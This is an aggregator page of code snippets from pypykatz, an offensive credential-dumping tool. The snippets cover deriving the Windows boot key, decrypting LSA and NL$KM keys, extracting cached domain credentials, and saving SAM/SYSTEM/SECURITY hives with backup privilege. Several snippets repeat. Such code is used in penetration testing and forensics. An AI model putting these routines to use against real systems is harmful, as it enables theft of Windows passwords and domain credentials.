How to use pypykatz - 10 common examples

To help you get started, we’ve selected a few pypykatz examples, based on popular ways it is used in public projects.

Secure your code as it's written. Use Snyk Code to scan source code in minutes - no build needed - and fix issues immediately.

github skelsec / pypykatz / pypykatz / registry / security / security.py View on Github external
logger.debug('[SECURITY] dump_dcc invoked')
		cache_reg = self.hive.find_key('Cache', False)
		if cache_reg is None:
			logger.debug('[SECURITY] No DCC secrets found')
			return
		values = self.hive.list_values(cache_reg)
		
		if values == []:
			logger.debug('[SECURITY] No DCC secrets found')
			return
			
		if b'NL$Control' in values:
			values.remove(b'NL$Control')
			
		if b'NL$IterationCount' in values:
			logger.debug('[SECURITY] DCC Setting iteration count')
			values.remove(b'NL$IterationCount')
			record = self.getValue('Cache\\NL$IterationCount')[1]
			if record > 10240:
				self.dcc_iteration_count = record & 0xfffffc00
			else:
				self.dcc_iteration_count = record * 1024
				
		
		self.get_lsa_key()
		self.get_NKLM_key()
		
		for value in values:
			logger.debug('[SECURITY] DCC Checking value: %s' % value)
			record_data = self.hive.get_value('Cache\\%s' % value.decode())[1]
			record = NL_RECORD.from_bytes(record_data)
github skelsec / pypykatz / pypykatz / registry / security / security.py View on Github external
def dump_dcc(self):
		logger.debug('[SECURITY] dump_dcc invoked')
		cache_reg = self.hive.find_key('Cache', False)
		if cache_reg is None:
			logger.debug('[SECURITY] No DCC secrets found')
			return
		values = self.hive.list_values(cache_reg)
		
		if values == []:
			logger.debug('[SECURITY] No DCC secrets found')
			return
			
		if b'NL$Control' in values:
			values.remove(b'NL$Control')
			
		if b'NL$IterationCount' in values:
			logger.debug('[SECURITY] DCC Setting iteration count')
			values.remove(b'NL$IterationCount')
github skelsec / pypykatz / pypykatz / registry / security / security.py View on Github external
def get_lsa_key(self):
		logger.debug('[SECURITY] Fetching LSA key...')
		value = self.hive.get_value('Policy\\PolEKList\\default', False)
		if value is None:
			value = self.hive.get_value('Policy\\PolSecretEncryptionKey\\default', False)
			if not value:
				logger.debug('[SECURITY] LSA key not found!')
				return None
			
			self.lsa_secret_key_vista_type = False
			logger.debug('[SECURITY] LSA secrets default to VISTA type')
		
		return self.decrypt_lsa_key(value[1])
github skelsec / pypykatz / pypykatz / registry / security / security.py View on Github external
def dump_dcc(self):
		logger.debug('[SECURITY] dump_dcc invoked')
		cache_reg = self.hive.find_key('Cache', False)
		if cache_reg is None:
			logger.debug('[SECURITY] No DCC secrets found')
			return
		values = self.hive.list_values(cache_reg)
		
		if values == []:
			logger.debug('[SECURITY] No DCC secrets found')
			return
			
		if b'NL$Control' in values:
			values.remove(b'NL$Control')
			
		if b'NL$IterationCount' in values:
			logger.debug('[SECURITY] DCC Setting iteration count')
			values.remove(b'NL$IterationCount')
			record = self.getValue('Cache\\NL$IterationCount')[1]
			if record > 10240:
				self.dcc_iteration_count = record & 0xfffffc00
			else:
				self.dcc_iteration_count = record * 1024
				
		
		self.get_lsa_key()
github skelsec / pypykatz / pypykatz / registry / security / security.py View on Github external
def decrypt_lsa_key(self, data):
		logger.debug('[SECURITY] Decrypting LSA key...')
		if self.lsa_secret_key_vista_type is True:
			record = LSA_SECRET.from_bytes(data)
			key = SECURITY.sha256_multi(self.bootkey, record.data[:32])
			secret_dec = b''
			cipher = AESModeOfOperationECB(key)
			n = 16
			for block in [record.data[32:][i:i+n] for i in range(0, len(record.data[32:]), n)]:  #terrible, terrible workaround
				if len(block) < n:
					block += b'\x00' * (n - len(block))
				secret_dec += cipher.decrypt(block)
			record = LSA_SECRET_BLOB.from_bytes(secret_dec)
			self.lsa_key = record.secret[52:][:32]
		
		else:
			ctx = hashlib.md5(self.bootkey)
			for i in range(1000):
github skelsec / pypykatz / pypykatz / registry / security / security.py View on Github external
def get_NKLM_key(self):
		logger.debug('[SECURITY] Fetching NK$LM key...')
		if self.lsa_key is None:
			self.get_lsa_secret_key()
			
		value = self.hive.get_value('Policy\\Secrets\\NL$KM\\CurrVal\\default')
		if value is None:
			logger.error('[SECURITY] Could not find NL$KM in registry')
			raise Exception('Could not find NL$KM in registry :(')
			
		if self.lsa_secret_key_vista_type is True:
			self.NKLM_key = b''
			record = LSA_SECRET.from_bytes(value[1])
			key = SECURITY.sha256_multi(self.lsa_key, record.data[:32])
			cipher = AESModeOfOperationECB(key)
			n = 16
			for block in [record.data[32:][i:i+n] for i in range(0, len(record.data[32:]), n)]:  #terrible, terrible workaround
				if len(block) < n:
github skelsec / pypykatz / pypykatz / registry / system / system.py View on Github external
if self.bootkey is not None:
			return self.bootkey
		if self.currentcontrol is None:
			self.get_currentcontrol()
			
		transforms = [8, 5, 4, 2, 11, 9, 13, 3, 0, 6, 1, 12, 14, 10, 15, 7]
		bootkey_obf = ''
		for key in ['JD', 'Skew1', 'GBG', 'Data']:
			bootkey_obf += self.hive.get_class('%s\\Control\\Lsa\\%s' % (self.currentcontrol, key))
		
		bootkey_obf = bytes.fromhex(bootkey_obf)
		self.bootkey = b''
		for i in range(len(bootkey_obf)):
			self.bootkey += bootkey_obf[transforms[i]:transforms[i] + 1]
		
		logger.debug('[SYSTEM] bootkey: %s' % self.bootkey.hex())
		return self.bootkey
github skelsec / pypykatz / pypykatz / registry / security / security.py View on Github external
def get_lsa_key(self):
		logger.debug('[SECURITY] Fetching LSA key...')
		value = self.hive.get_value('Policy\\PolEKList\\default', False)
		if value is None:
			value = self.hive.get_value('Policy\\PolSecretEncryptionKey\\default', False)
			if not value:
				logger.debug('[SECURITY] LSA key not found!')
				return None
			
			self.lsa_secret_key_vista_type = False
			logger.debug('[SECURITY] LSA secrets default to VISTA type')
		
		return self.decrypt_lsa_key(value[1])
github skelsec / pypykatz / pypykatz / registry / offline_parser.py View on Github external
import ntpath
		except Exception as e:
			logger.error('Could not import necessary packages! Are you on Windows? Error: %s' % str(e))
			raise
			
		sam_name = ntpath.join(tempfile.gettempdir(), os.urandom(4).hex())
		system_name = ntpath.join(tempfile.gettempdir(), os.urandom(4).hex())
		security_name = ntpath.join(tempfile.gettempdir(), os.urandom(4).hex())
		
		locations = [
			('SAM', sam_name),
			('SYSTEM', system_name),
			('SECURITY', security_name),
		]
		
		logger.debug('Obtaining SE_BACKUP privilege...')
		try:
			po = ProcessManipulator()
			po.set_privilege(SE_BACKUP)
		except Exception as e:
			logger.error('Failed to obtain SE_BACKUP privilege! Registry dump will not work! Reason: %s' % str(e))
			raise e
		logger.debug('Obtaining SE_BACKUP OK!')
		
		dumped_names = {}
		for reg_name, location in locations:
			logger.debug('Dumping %s...' % reg_name)
			try:
				key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, reg_name, access=0x00020000)
				winreg.SaveKey(key, location)
				key.Close()
			except Exception as e:
github skelsec / pypykatz / pypykatz / registry / system / system.py View on Github external
def get_currentcontrol(self):
		logger.debug('[SYSTEM] determining current control set')
		if self.currentcontrol is not None:
			return self.currentcontrol
			
		ccs = self.hive.get_value('Select\\Current')[1]
		self.currentcontrol = "ControlSet%03d" % ccs
		logger.debug('[SYSTEM] current control set name: %s' % self.currentcontrol)
		return self.currentcontrol